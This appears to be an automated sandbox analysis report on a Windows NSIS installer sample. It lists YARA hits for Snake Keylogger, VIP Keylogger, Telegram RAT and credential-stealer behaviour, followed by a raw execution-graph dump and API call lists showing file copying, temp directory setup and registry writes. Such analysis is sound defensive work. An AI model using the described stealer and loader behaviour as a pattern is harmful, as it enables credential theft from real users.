                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                    • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.22144177112.0000000035965000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.22140550905.0000000034921000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.22140550905.00000000349E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                    • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:low
                                                                                    Has exited:false


                                                                                      Execution Graph

                                                                                      Execution Coverage:24.4%
                                                                                      Dynamic/Decrypted Code Coverage:17.1%
                                                                                      Signature Coverage:16.9%
                                                                                      Total number of Nodes:1358
                                                                                      Total number of Limit Nodes:53
4894 10001603 4893->4894 4895 1000161a VirtualFree 4893->4895 4894->4892 4895->4892 4896 402814 4897 4029ea 18 API calls 4896->4897 4898 40281a 4897->4898 4899 40284b 4898->4899 4900 40266d 4898->4900 4902 402828 4898->4902 4899->4900 4901 405b9e 18 API calls 4899->4901 4901->4900 4902->4900 4904 405ada wsprintfA 4902->4904 4904->4900 3706 401595 3707 402a07 18 API calls 3706->3707 3708 40159c SetFileAttributesA 3707->3708 3709 4015ae 3708->3709 4905 401c95 4906 4029ea 18 API calls 4905->4906 4907 401c9c 4906->4907 4908 4029ea 18 API calls 4907->4908 4909 401ca4 GetDlgItem 4908->4909 4910 4024c9 4909->4910 4911 100018d6 4912 100018df 4911->4912 4913 10001278 2 API calls 4912->4913 4914 10001a0c GlobalFree GlobalFree 4913->4914 3715 402517 3716 4029ea 18 API calls 3715->3716 3719 402521 3716->3719 3717 402597 3718 402555 ReadFile 3718->3717 3718->3719 3719->3717 3719->3718 3720 402599 3719->3720 3721 4025a9 3719->3721 3724 405ada wsprintfA 3720->3724 3721->3717 3723 4025bf SetFilePointer 3721->3723 3723->3717 3724->3717 4915 10001058 4916 1000123b 3 API calls 4915->4916 4918 10001074 4916->4918 4917 100010dc 4918->4917 4919 10001091 4918->4919 4920 100014d8 4 API calls 4918->4920 4921 100014d8 4 API calls 4919->4921 4920->4919 4922 100010a1 4921->4922 4923 100010b1 4922->4923 4924 100010a8 GlobalSize 4922->4924 4925 100010b5 GlobalAlloc 4923->4925 4926 100010c6 4923->4926 4924->4923 4927 100014ff 3 API calls 4925->4927 4928 100010d1 GlobalFree 4926->4928 4927->4926 4928->4917 3740 40231a 3741 402320 3740->3741 3742 402a07 18 API calls 3741->3742 3743 402332 3742->3743 3744 402a07 18 API calls 3743->3744 3745 40233c RegCreateKeyExA 3744->3745 3746 402366 3745->3746 3747 40266d 3745->3747 3748 40237e 3746->3748 3749 402a07 18 API calls 3746->3749 3750 40238a 3748->3750 3753 4029ea 18 API calls 3748->3753 3752 402377 lstrlenA 3749->3752 3751 4023a5 RegSetValueExA 3750->3751 3757 402e6c 3750->3757 3755 4023bb RegCloseKey 3751->3755 3752->3748 3753->3750 3755->3747 3759 
402e84 3757->3759 3758 402eb1 3779 403072 ReadFile 3758->3779 3759->3758 3781 4030a4 SetFilePointer 3759->3781 3763 403001 3765 40304d 3763->3765 3770 403005 3763->3770 3764 402ece GetTickCount 3766 402fec 3764->3766 3776 402ef7 3764->3776 3767 403072 ReadFile 3765->3767 3766->3751 3767->3766 3768 403072 ReadFile 3768->3776 3769 403072 ReadFile 3769->3770 3770->3766 3770->3769 3771 403025 WriteFile 3770->3771 3771->3766 3772 40303a 3771->3772 3772->3766 3772->3770 3774 40304b 3772->3774 3773 402f4d GetTickCount 3773->3776 3774->3766 3775 402f76 MulDiv wsprintfA 3777 404e89 25 API calls 3775->3777 3776->3766 3776->3768 3776->3773 3776->3775 3778 402fb4 WriteFile 3776->3778 3777->3776 3778->3766 3778->3776 3780 402ebc 3779->3780 3780->3763 3780->3764 3780->3766 3781->3758 4929 401b9b 4930 405b9e 18 API calls 4929->4930 4931 401ba6 4930->4931 4932 401b1d 4933 401b1e 4932->4933 4934 402211 4933->4934 4945 405b7c lstrcpynA 4933->4945 4935 405b9e 18 API calls 4934->4935 4936 40221e 4935->4936 4938 4053ad MessageBoxIndirectA 4936->4938 4944 402224 4938->4944 4939 401b44 4946 405b7c lstrcpynA 4939->4946 4941 401b53 4941->4934 4942 4027c2 4941->4942 4947 405b7c lstrcpynA 4942->4947 4945->4939 4946->4941 4947->4944 4948 100010e0 4949 1000110e 4948->4949 4950 1000123b 3 API calls 4949->4950 4958 1000111e 4950->4958 4951 100011c4 GlobalFree 4952 100012bf 2 API calls 4952->4958 4953 100011c3 4953->4951 4954 1000123b 3 API calls 4954->4958 4955 10001278 2 API calls 4959 100011b1 GlobalFree 4955->4959 4956 10001155 GlobalAlloc 4956->4958 4957 100011ea GlobalFree 4957->4958 4958->4951 4958->4952 4958->4953 4958->4954 4958->4955 4958->4956 4958->4957 4958->4959 4960 100012e8 lstrcpyA 4958->4960 4959->4958 4960->4958 4961 4016a1 4962 402a07 18 API calls 4961->4962 4963 4016a7 GetFullPathNameA 4962->4963 4966 4016be 4963->4966 4970 4016df 4963->4970 4964 4016f3 GetShortPathNameA 4965 40289c 4964->4965 4967 405e80 2 API calls 4966->4967 4966->4970 4968 4016cf 4967->4968 4968->4970 
4971 405b7c lstrcpynA 4968->4971 4970->4964 4970->4965 4971->4970 3787 401922 3790 405459 3787->3790 3827 405717 3790->3827 3793 405481 DeleteFileA 3822 401928 3793->3822 3794 405498 3795 4055c6 3794->3795 3841 405b7c lstrcpynA 3794->3841 3800 405e80 2 API calls 3795->3800 3795->3822 3797 4054be 3798 4054d1 3797->3798 3799 4054c4 lstrcatA 3797->3799 3842 405670 lstrlenA 3798->3842 3801 4054d7 3799->3801 3803 4055ea 3800->3803 3804 4054e5 lstrcatA 3801->3804 3805 4054f0 lstrlenA FindFirstFileA 3801->3805 3803->3822 3860 405629 lstrlenA CharPrevA 3803->3860 3804->3805 3805->3795 3825 405514 3805->3825 3807 405654 CharNextA 3807->3825 3809 405411 5 API calls 3810 405600 3809->3810 3811 405604 3810->3811 3812 40561a 3810->3812 3817 404e89 25 API calls 3811->3817 3811->3822 3813 404e89 25 API calls 3812->3813 3813->3822 3814 4055a5 FindNextFileA 3816 4055bd FindClose 3814->3816 3814->3825 3816->3795 3818 405611 3817->3818 3820 405a30 40 API calls 3818->3820 3820->3822 3821 405459 64 API calls 3821->3825 3823 404e89 25 API calls 3823->3814 3824 404e89 25 API calls 3824->3825 3825->3807 3825->3814 3825->3821 3825->3823 3825->3824 3846 405b7c lstrcpynA 3825->3846 3847 405411 3825->3847 3855 405a30 3825->3855 3863 405b7c lstrcpynA 3827->3863 3829 405728 3864 4056c2 CharNextA CharNextA 3829->3864 3832 405479 3832->3793 3832->3794 3833 405de7 5 API calls 3839 40573e 3833->3839 3834 405769 lstrlenA 3835 405774 3834->3835 3834->3839 3836 405629 3 API calls 3835->3836 3838 405779 GetFileAttributesA 3836->3838 3837 405e80 2 API calls 3837->3839 3838->3832 3839->3832 3839->3834 3839->3837 3840 405670 2 API calls 3839->3840 3840->3834 3841->3797 3843 40567d 3842->3843 3844 405682 CharPrevA 3843->3844 3845 40568e 3843->3845 3844->3843 3844->3845 3845->3801 3846->3825 3870 405805 GetFileAttributesA 3847->3870 3850 40543e 3850->3825 3851 405434 DeleteFileA 3853 40543a 3851->3853 3852 40542c RemoveDirectoryA 3852->3853 3853->3850 3854 40544a SetFileAttributesA 3853->3854 3854->3850 
3873 405ea7 GetModuleHandleA 3855->3873 3859 405a58 3859->3825 3861 405643 lstrcatA 3860->3861 3862 4055f4 3860->3862 3861->3862 3862->3809 3863->3829 3865 4056dd 3864->3865 3869 4056ed 3864->3869 3867 4056e8 CharNextA 3865->3867 3865->3869 3866 40570d 3866->3832 3866->3833 3867->3866 3868 405654 CharNextA 3868->3869 3869->3866 3869->3868 3871 40541d 3870->3871 3872 405817 SetFileAttributesA 3870->3872 3871->3850 3871->3851 3871->3852 3872->3871 3874 405ec3 LoadLibraryA 3873->3874 3875 405ece GetProcAddress 3873->3875 3874->3875 3876 405a37 3874->3876 3875->3876 3876->3859 3877 4058a2 lstrcpyA 3876->3877 3878 4058f1 GetShortPathNameA 3877->3878 3879 4058cb 3877->3879 3881 405906 3878->3881 3882 405a2a 3878->3882 3901 40582a GetFileAttributesA CreateFileA 3879->3901 3881->3882 3884 40590e wsprintfA 3881->3884 3882->3859 3883 4058d5 CloseHandle GetShortPathNameA 3883->3882 3885 4058e9 3883->3885 3886 405b9e 18 API calls 3884->3886 3885->3878 3885->3882 3887 405936 3886->3887 3902 40582a GetFileAttributesA CreateFileA 3887->3902 3889 405943 3889->3882 3890 405952 GetFileSize GlobalAlloc 3889->3890 3891 405a23 CloseHandle 3890->3891 3892 405974 ReadFile 3890->3892 3891->3882 3892->3891 3893 40598c 3892->3893 3893->3891 3903 40578f lstrlenA 3893->3903 3896 4059a5 lstrcpyA 3899 4059c7 3896->3899 3897 4059b9 3898 40578f 4 API calls 3897->3898 3898->3899 3900 4059fe SetFilePointer WriteFile GlobalFree 3899->3900 3900->3891 3901->3883 3902->3889 3904 4057d0 lstrlenA 3903->3904 3905 4057d8 3904->3905 3906 4057a9 lstrcmpiA 3904->3906 3905->3896 3905->3897 3906->3905 3907 4057c7 CharNextA 3906->3907 3907->3904 4972 402626 4973 402641 4972->4973 4974 402629 4972->4974 4975 4027c7 4973->4975 4978 405b7c lstrcpynA 4973->4978 4976 402636 FindNextFileA 4974->4976 4976->4973 4978->4975 4979 401d29 GetDC GetDeviceCaps 4980 4029ea 18 API calls 4979->4980 4981 401d44 MulDiv ReleaseDC 4980->4981 4982 4029ea 18 API calls 4981->4982 4983 401d63 4982->4983 4984 405b9e 18 API calls 
4983->4984 4985 401d9c CreateFontIndirectA 4984->4985 4986 4024c9 4985->4986 4103 40172c 4104 402a07 18 API calls 4103->4104 4105 401733 4104->4105 4109 405859 4105->4109 4107 40173a 4108 405859 2 API calls 4107->4108 4108->4107 4110 405864 GetTickCount GetTempFileNameA 4109->4110 4111 405891 4110->4111 4112 405895 4110->4112 4111->4110 4111->4112 4112->4107 4113 401dac 4114 4029ea 18 API calls 4113->4114 4115 401db2 4114->4115 4116 4029ea 18 API calls 4115->4116 4117 401dbb 4116->4117 4118 401dc2 ShowWindow 4117->4118 4119 401dcd EnableWindow 4117->4119 4120 40289c 4118->4120 4119->4120 4987 401eac 4988 402a07 18 API calls 4987->4988 4989 401eb3 4988->4989 4990 405e80 2 API calls 4989->4990 4991 401eb9 4990->4991 4992 401ecb 4991->4992 4994 405ada wsprintfA 4991->4994 4994->4992 4995 40192d 4996 402a07 18 API calls 4995->4996 4997 401934 lstrlenA 4996->4997 4998 4024c9 4997->4998 4999 401cb0 5000 4029ea 18 API calls 4999->5000 5001 401cc0 SetWindowLongA 5000->5001 5002 40289c 5001->5002 5003 4024b0 5004 4024ba 5003->5004 5006 40249a 5003->5006 5007 40582a GetFileAttributesA CreateFileA 5004->5007 5007->5006 5008 401a31 5009 4029ea 18 API calls 5008->5009 5010 401a37 5009->5010 5011 4029ea 18 API calls 5010->5011 5012 4019e1 5011->5012 4350 401e32 4351 402a07 18 API calls 4350->4351 4352 401e38 4351->4352 4353 404e89 25 API calls 4352->4353 4354 401e42 4353->4354 4355 40534c 2 API calls 4354->4355 4357 401e48 4355->4357 4356 40266d 4357->4356 4358 401e9e CloseHandle 4357->4358 4359 401e67 WaitForSingleObject 4357->4359 4361 405ee0 2 API calls 4357->4361 4358->4356 4359->4357 4360 401e75 GetExitCodeProcess 4359->4360 4362 401e92 4360->4362 4363 401e87 4360->4363 4361->4359 4362->4358 4364 401e90 4362->4364 4366 405ada wsprintfA 4363->4366 4364->4358 4366->4364 4367 4015b3 4368 402a07 18 API calls 4367->4368 4369 4015ba 4368->4369 4370 4056c2 4 API calls 4369->4370 4381 4015c2 4370->4381 4371 40160a 4373 401638 4371->4373 4374 40160f 4371->4374 4372 405654 CharNextA 
4375 4015d0 CreateDirectoryA 4372->4375 4379 401423 25 API calls 4373->4379 4376 401423 25 API calls 4374->4376 4377 4015e5 GetLastError 4375->4377 4375->4381 4378 401616 4376->4378 4380 4015f2 GetFileAttributesA 4377->4380 4377->4381 4385 405b7c lstrcpynA 4378->4385 4384 401630 4379->4384 4380->4381 4381->4371 4381->4372 4383 401621 SetCurrentDirectoryA 4383->4384 4385->4383 5013 4042b4 SetDlgItemTextA 5014 403ef3 8 API calls 5013->5014 5015 4042c5 5014->5015 4386 402036 4387 402a07 18 API calls 4386->4387 4388 40203d 4387->4388 4389 402a07 18 API calls 4388->4389 4390 402047 4389->4390 4391 402a07 18 API calls 4390->4391 4392 402050 4391->4392 4393 402a07 18 API calls 4392->4393 4394 40205a 4393->4394 4395 402a07 18 API calls 4394->4395 4396 402064 4395->4396 4397 402078 CoCreateInstance 4396->4397 4398 402a07 18 API calls 4396->4398 4401 402097 4397->4401 4402 40214d 4397->4402 4398->4397 4399 401423 25 API calls 4400 40217f 4399->4400 4401->4402 4403 40212c MultiByteToWideChar 4401->4403 4402->4399 4402->4400 4403->4402 5016 10002977 5017 1000298f 5016->5017 5018 10001551 2 API calls 5017->5018 5019 100029aa 5018->5019 5020 4014b7 5021 4014bd 5020->5021 5022 401389 2 API calls 5021->5022 5023 4014c5 5022->5023 5024 4027b7 5025 4027cc 5024->5025 5026 4027bd 5024->5026 5031 405ada wsprintfA 5025->5031 5030 405b7c lstrcpynA 5026->5030 5029 4027c7 5030->5029 5031->5029 4404 402438 4405 402b11 19 API calls 4404->4405 4406 402442 4405->4406 4407 4029ea 18 API calls 4406->4407 4408 40244b 4407->4408 4409 402455 4408->4409 4413 40266d 4408->4413 4410 402462 RegEnumKeyA 4409->4410 4411 40246e RegEnumValueA 4409->4411 4412 402487 RegCloseKey 4410->4412 4411->4412 4411->4413 4412->4413 4415 401bb8 4416 4029ea 18 API calls 4415->4416 4417 401bbf 4416->4417 4418 4029ea 18 API calls 4417->4418 4419 401bc9 4418->4419 4420 401bd9 4419->4420 4421 402a07 18 API calls 4419->4421 4422 401be9 4420->4422 4423 402a07 18 API calls 4420->4423 4421->4420 4424 401bf4 4422->4424 4425 
401c38 4422->4425 4423->4422 4427 4029ea 18 API calls 4424->4427 4426 402a07 18 API calls 4425->4426 4429 401c3d 4426->4429 4428 401bf9 4427->4428 4430 4029ea 18 API calls 4428->4430 4431 402a07 18 API calls 4429->4431 4432 401c02 4430->4432 4433 401c46 FindWindowExA 4431->4433 4434 401c28 SendMessageA 4432->4434 4435 401c0a SendMessageTimeoutA 4432->4435 4436 401c64 4433->4436 4434->4436 4435->4436 4437 402239 4438 402241 4437->4438 4439 402247 4437->4439 4440 402a07 18 API calls 4438->4440 4441 402a07 18 API calls 4439->4441 4444 402257 4439->4444 4440->4439 4441->4444 4442 402a07 18 API calls 4445 402265 4442->4445 4443 402a07 18 API calls 4446 40226e WritePrivateProfileStringA 4443->4446 4444->4442 4444->4445 4445->4443 4447 4039b9 4448 4039d1 4447->4448 4449 403b0c 4447->4449 4448->4449 4450 4039dd 4448->4450 4451 403b5d 4449->4451 4452 403b1d GetDlgItem GetDlgItem 4449->4452 4453 4039e8 SetWindowPos 4450->4453 4454 4039fb 4450->4454 4456 403bb7 4451->4456 4464 401389 2 API calls 4451->4464 4455 403e8c 19 API calls 4452->4455 4453->4454 4457 403a00 ShowWindow 4454->4457 4458 403a18 4454->4458 4459 403b47 SetClassLongA 4455->4459 4460 403ed8 SendMessageA 4456->4460 4477 403b07 4456->4477 4457->4458 4461 403a20 DestroyWindow 4458->4461 4462 403a3a 4458->4462 4463 40140b 2 API calls 4459->4463 4474 403bc9 4460->4474 4516 403e15 4461->4516 4465 403a50 4462->4465 4466 403a3f SetWindowLongA 4462->4466 4463->4451 4467 403b8f 4464->4467 4470 403af9 4465->4470 4471 403a5c GetDlgItem 4465->4471 4466->4477 4467->4456 4472 403b93 SendMessageA 4467->4472 4468 40140b 2 API calls 4468->4474 4469 403e17 DestroyWindow EndDialog 4469->4516 4476 403ef3 8 API calls 4470->4476 4475 403a6f SendMessageA IsWindowEnabled 4471->4475 4479 403a8c 4471->4479 4472->4477 4473 403e46 ShowWindow 4473->4477 4474->4468 4474->4469 4474->4477 4478 405b9e 18 API calls 4474->4478 4484 403e8c 19 API calls 4474->4484 4492 403e8c 19 API calls 4474->4492 4507 403d57 DestroyWindow 4474->4507 4475->4477 
4475->4479 4476->4477 4478->4474 4480 403a99 4479->4480 4481 403ae0 SendMessageA 4479->4481 4482 403aac 4479->4482 4490 403a91 4479->4490 4480->4481 4480->4490 4481->4470 4485 403ab4 4482->4485 4486 403ac9 4482->4486 4483 403e65 SendMessageA 4487 403ac7 4483->4487 4484->4474 4488 40140b 2 API calls 4485->4488 4489 40140b 2 API calls 4486->4489 4487->4470 4488->4490 4491 403ad0 4489->4491 4490->4483 4491->4470 4491->4490 4493 403c44 GetDlgItem 4492->4493 4494 403c61 ShowWindow KiUserCallbackDispatcher 4493->4494 4495 403c59 4493->4495 4517 403eae KiUserCallbackDispatcher 4494->4517 4495->4494 4497 403c8b EnableWindow 4500 403c9f 4497->4500 4498 403ca4 GetSystemMenu EnableMenuItem SendMessageA 4499 403cd4 SendMessageA 4498->4499 4498->4500 4499->4500 4500->4498 4518 403ec1 SendMessageA 4500->4518 4519 405b7c lstrcpynA 4500->4519 4503 403d02 lstrlenA 4504 405b9e 18 API calls 4503->4504 4505 403d13 SetWindowTextA 4504->4505 4506 401389 2 API calls 4505->4506 4506->4474 4508 403d71 CreateDialogParamA 4507->4508 4507->4516 4509 403da4 4508->4509 4508->4516 4510 403e8c 19 API calls 4509->4510 4511 403daf GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4510->4511 4512 401389 2 API calls 4511->4512 4513 403df5 4512->4513 4513->4477 4514 403dfd ShowWindow 4513->4514 4515 403ed8 SendMessageA 4514->4515 4515->4516 4516->4473 4516->4477 4517->4497 4518->4500 4519->4503 4520 4022be 4521 4022c3 4520->4521 4522 4022ee 4520->4522 4524 402b11 19 API calls 4521->4524 4523 402a07 18 API calls 4522->4523 4525 4022f5 4523->4525 4526 4022ca 4524->4526 4533 402a47 RegOpenKeyExA 4525->4533 4527 4022d4 4526->4527 4532 40230d 4526->4532 4528 402a07 18 API calls 4527->4528 4529 4022db RegDeleteValueA RegCloseKey 4528->4529 4529->4532 4539 40230b 4533->4539 4541 402a72 4533->4541 4534 402a98 RegEnumKeyA 4535 402aaa RegCloseKey 4534->4535 4534->4541 4536 405ea7 3 API calls 4535->4536 4538 402aba 4536->4538 4537 402acf RegCloseKey 4537->4539 4538->4539 4542 402aea RegDeleteKeyA 4538->4542 
4539->4532 4540 402a47 3 API calls 4540->4541 4541->4534 4541->4535 4541->4537 4541->4540 4542->4539 4543 40173f 4544 402a07 18 API calls 4543->4544 4545 401746 4544->4545 4546 401764 4545->4546 4547 40176c 4545->4547 4582 405b7c lstrcpynA 4546->4582 4583 405b7c lstrcpynA 4547->4583 4550 401777 4552 405629 3 API calls 4550->4552 4551 40176a 4554 405de7 5 API calls 4551->4554 4553 40177d lstrcatA 4552->4553 4553->4551 4575 401789 4554->4575 4555 405e80 2 API calls 4555->4575 4557 405805 2 API calls 4557->4575 4558 4017a0 CompareFileTime 4558->4575 4559 401864 4560 404e89 25 API calls 4559->4560 4563 40186e 4560->4563 4561 404e89 25 API calls 4570 401850 4561->4570 4562 405b7c lstrcpynA 4562->4575 4564 402e6c 33 API calls 4563->4564 4565 401881 4564->4565 4566 401895 SetFileTime 4565->4566 4568 4018a7 CloseHandle 4565->4568 4566->4568 4567 405b9e 18 API calls 4567->4575 4569 4018b8 4568->4569 4568->4570 4571 4018d0 4569->4571 4572 4018bd 4569->4572 4574 405b9e 18 API calls 4571->4574 4573 405b9e 18 API calls 4572->4573 4576 4018c5 lstrcatA 4573->4576 4577 4018d8 4574->4577 4575->4555 4575->4557 4575->4558 4575->4559 4575->4562 4575->4567 4578 4053ad MessageBoxIndirectA 4575->4578 4580 40183b 4575->4580 4581 40582a GetFileAttributesA CreateFileA 4575->4581 4576->4577 4579 4053ad MessageBoxIndirectA 4577->4579 4578->4575 4579->4570 4580->4561 4580->4570 4581->4575 4582->4551 4583->4550 5032 40163f 5033 402a07 18 API calls 5032->5033 5034 401645 5033->5034 5035 405e80 2 API calls 5034->5035 5036 40164b 5035->5036 5037 40193f 5038 4029ea 18 API calls 5037->5038 5039 401946 5038->5039 5040 4029ea 18 API calls 5039->5040 5041 401950 5040->5041 5042 402a07 18 API calls 5041->5042 5043 401959 5042->5043 5044 40196c lstrlenA 5043->5044 5045 4019a7 5043->5045 5046 401976 5044->5046 5046->5045 5050 405b7c lstrcpynA 5046->5050 5048 401990 5048->5045 5049 40199d lstrlenA 5048->5049 5049->5045 5050->5048

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • #17.COMCTL32 ref: 00403110
                                                                                      • SetErrorMode.KERNELBASE(00008001), ref: 0040311B
                                                                                      • OleInitialize.OLE32(00000000), ref: 00403122
                                                                                        • Part of subcall function 00405EA7: GetModuleHandleA.KERNEL32(?,?,?,00403134,?), ref: 00405EB9
                                                                                        • Part of subcall function 00405EA7: LoadLibraryA.KERNELBASE(?,?,?,00403134,?), ref: 00405EC4
                                                                                        • Part of subcall function 00405EA7: GetProcAddress.KERNEL32(00000000,?), ref: 00405ED5
                                                                                      • SHGetFileInfoA.SHELL32(0079DCB8,00000000,?,00000160,00000000,?), ref: 0040314A
                                                                                        • Part of subcall function 00405B7C: lstrcpynA.KERNEL32(?,?,00000400,0040315F,007A1F00,NSIS Error), ref: 00405B89
                                                                                      • GetCommandLineA.KERNEL32(007A1F00,NSIS Error), ref: 0040315F
                                                                                      • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe",00000000), ref: 00403172
                                                                                      • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe",00000020), ref: 0040319D
                                                                                      • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040329A
                                                                                      • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032AB
                                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032B7
                                                                                      • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032CB
                                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004032D3
                                                                                      • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004032E4
                                                                                      • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004032EC
                                                                                      • DeleteFileA.KERNELBASE(1033), ref: 00403300
                                                                                      • OleUninitialize.OLE32(?), ref: 004033AE
                                                                                      • ExitProcess.KERNEL32 ref: 004033CE
                                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe",00000000,?), ref: 004033DA
                                                                                      • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 004033E6
                                                                                      • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004033F2
                                                                                      • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004033F9
                                                                                      • DeleteFileA.KERNEL32(0079D8B8,0079D8B8,?,007A3000,?), ref: 00403452
                                                                                      • CopyFileA.KERNEL32(C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe,0079D8B8,00000001), ref: 00403466
                                                                                      • CloseHandle.KERNEL32(00000000,0079D8B8,0079D8B8,?,0079D8B8,00000000), ref: 00403493
                                                                                      • GetCurrentProcess.KERNEL32(?,?,00000005,?,00000003), ref: 004034E8
                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 00403524
                                                                                      • ExitProcess.KERNEL32 ref: 00403547
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                      • String ID: "$"C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid\Urging$C:\Users\user\Desktop$C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp

                                                                                      Control-flow Graph (entry block 404fc7-404fe2; graph rendering not reproduced)
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,00000403), ref: 00405026
                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00405035
                                                                                      • GetClientRect.USER32(?,?), ref: 00405072
                                                                                      • GetSystemMetrics.USER32(00000015), ref: 0040507A
                                                                                      • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 0040509B
